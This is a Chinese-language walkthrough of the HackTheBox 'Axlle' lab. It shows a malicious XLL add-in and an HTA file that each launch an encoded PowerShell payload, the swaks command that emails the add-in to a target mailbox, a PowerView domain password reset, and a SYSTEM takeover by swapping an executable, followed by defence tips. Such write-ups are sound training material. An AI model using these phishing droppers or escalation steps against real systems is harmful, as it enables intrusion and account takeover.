THB-Axlle-域内邮件钓n鱼到系统权限提升的渗透实践

(Updated: )
, ,

域内邮件钓鱼到系统权限提升的渗透实践

🚀 靶场概述

难度:Hard
描述:通过邮件钓鱼突破边界,最终实现域内渗透的靶场练习

📋 基本信息

🚀 本地机器信息 目标机器信息
IP 10.10.16.27 10.10.11.21
OS Kali Windows

🔍 信息搜集

1. 🛠️ 端口扫描

首先使用 naabu 进行快速端口扫描:

1
2
3
4
5
6
7
❯ naabu --host 10.10.11.21 > ports.txt

[INF] Found 8 ports on host 10.10.11.21 (10.10.11.21)

# 整理开放端口列表
cut -d ":" -f2 ports.txt | paste -sd,
80,53,135,139,389,445,88,25

接着使用 nmap 进行详细的版本探测:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ nmap -sCV -p 80,53,135,139,389,445,88,25 10.10.11.21 -T4

PORT    STATE SERVICE       VERSION                             
25/tcp  open  smtp         hMailServer smtpd                                                                                   
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP     
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY                                                                   
53/tcp  open  domain       Simple DNS Plus                                                                                     
80/tcp  open  http         Microsoft IIS httpd 10.0                                                                            
|_http-server-header: Microsoft-IIS/10.0                                                                                        
88/tcp  open  kerberos-sec Microsoft Windows Kerberos
135/tcp open  msrpc        Microsoft Windows RPC            
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn       
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: axlle.htb0.)        
445/tcp open  microsoft-ds Windows Server SMB

2. 🔎 服务枚举

SMTP 服务 (25/TCP)

  • 运行 hMailServer smtpd
  • 支持的命令:
    • AUTH LOGIN: 支持认证登录
    • VRFY: 可能用于用户枚举
    • SIZE 20480000: 最大邮件大小限制

DNS 服务 (53/TCP)

  • 运行 Simple DNS Plus
  • 域名:axlle.htb0

Web 服务 (80/TCP)

  • Microsoft IIS 10.0
  • 需进行详细的 Web 应用测试

域控服务

  • Kerberos (88/TCP)
  • LDAP (389/TCP): Active Directory LDAP
  • NetBIOS (139/TCP)
  • SMB (445/TCP)
    • 消息签名已启用且必需
    • Windows Server SMB 服务

RPC 服务 (135/TCP)

  • Microsoft Windows RPC

🧠 渗透思路

攻击面分析

  1. 邮件系统

    • hMailServer 可能存在配置问题
    • 可尝试邮件钓鱼攻击

  2. 域环境

    • 完整的 AD 域环境
    • 可能存在域用户枚举机会
    • Kerberos 认证可能存在配置问题

  3. Web 应用

    • IIS 10.0 可能存在漏洞
    • 需进行详细的 Web 应用测试

🌐 初始访问

1. Web 应用信息收集

从网站上发现重要信息:

如果您有任何未付的发票或请求,请以Excel格式将其通过电子邮件发送至 accounts@axlle.htb。请注意,由于安全状况,所有宏都被禁用。

2. XLL 文件攻击

由于目标禁用了宏,我们可以使用 XLL (Excel Add-In) 进行攻击。XLL 是专为 Excel 设计的动态链接库,可以扩展 Excel 功能。

  1. 创建恶意 XLL 文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <windows.h>
 
__declspec(dllexport) void __cdecl xlAutoOpen(void);
 
void __cdecl xlAutoOpen() {
    WinExec("powershell -e <base64_encoded_payload>", 1);
}
 
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

  1. 编译 XLL 文件:

    1
    x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll exp.c -luser32

  2. 发送钓鱼邮件:

    1
    2
    3
    4
    5
    swaks --to accounts@axlle.htb \
          --from root@test.htb \
          --body "Shell" \
          --header "Subject: Help me Breach the System" \
          --attach @shell.xll


3. HTA 文件攻击

我们可以使用 HTA 文件攻击来获取 shell。HTA 文件是 HTML 应用程序,可以包含恶意代码。

  1. 创建恶意 HTA 文件:
1
2
3
4
5
6
7
8
9
10
11
12
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
        var c = "powershell -e <base64_encoded_payload>";  
        new ActiveXObject('WScript.Shell').Run(c, 0, true); 
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
  1. 发送 HTA 文件:
    1
    impacket-smbserver -smb2support share .

成功获取反弹 shell:

🔨 权限提升

1. 域内信息收集

使用 BloodHound 进行域内信息收集:


  1. 上传 BloodHound:

    1
    impacket-smbserver share $(pwd) -smb2support

  2. 在目标机器上执行:

    1
    .\bloodhound.exe -c all

2. 权限提升路径分析

通过 BloodHound 分析发现:

  • WEB DEVS@AXLLE.HTB 的成员可以修改用户 JACOB.GREENY@AXLLE.HTB 的密码
  • 不需要知道该用户的当前密码

3. 利用 PowerView 修改密码

  1. 上传 PowerView:

    1
    copy \\10.10.16.27\share\PowerView.ps1 .

  2. 修改用户密码:

    1
    Set-DomainUserPassword -Identity 'JACOB.GREENY' -AccountPassword (ConvertTo-SecureString -AsPlainText 'NewPassword123!' -Force)

  1. 使用新密码通过 WinRM 连接:


4. 系统权限提升

  1. 发现自动化程序:
    在 App Development 文件夹中发现 README.md 文件:

README.md 文件显示 standalonerunner.exe 文件正在作为自动化的 SYSTEM 运行:

  1. 检查文件权限:

  2. 替换恶意程序:
    创建反弹 shell 的可执行文件并替换原文件

  3. 等待自动化运行,获取 SYSTEM 权限:

📚 知识点回顾

1. 信息收集技巧

  • 端口扫描
    • 使用 naabu 快速扫描
    • 使用 nmap 进行详细版本探测
  • 服务枚举
    • SMTP 服务配置分析
    • Active Directory 域环境识别
    • Web 服务版本识别

2. 攻击技术

  • 邮件钓鱼
    • XLL 文件攻击绕过宏限制
    • HTA 文件执行技巧
  • 域内渗透
    • BloodHound 域内信息收集
    • PowerView 密码修改
    • 自动化任务劫持

3. 权限提升技巧

  • 横向移动
    • 利用域用户权限
    • WinRM 远程连接
  • 纵向提升
    • 文件权限分析
    • 系统服务替换
    • 自动化任务利用

🎯 总结

攻击链回顾

  1. 通过邮件系统投递 XLL 文件获取初始访问
  2. 利用 HTA 文件获取更稳定的 shell
  3. 使用 BloodHound 发现域内提权路径
  4. 通过 PowerView 修改域用户密码
  5. 利用自动化任务获取系统权限

防御建议

  1. 邮件安全
    • 严格限制附件类型
    • 实施邮件安全网关
  2. 域环境加固
    • 严格控制域用户权限
    • 定期审计域内权限
  3. 系统加固
    • 限制自动化任务权限
    • 加强文件系统权限控制

工具总结

  • 信息收集:naabu、nmap
  • 域内渗透:BloodHound、PowerView
  • 权限提升:WinPEAS
  • 远程连接:Evil-WinRM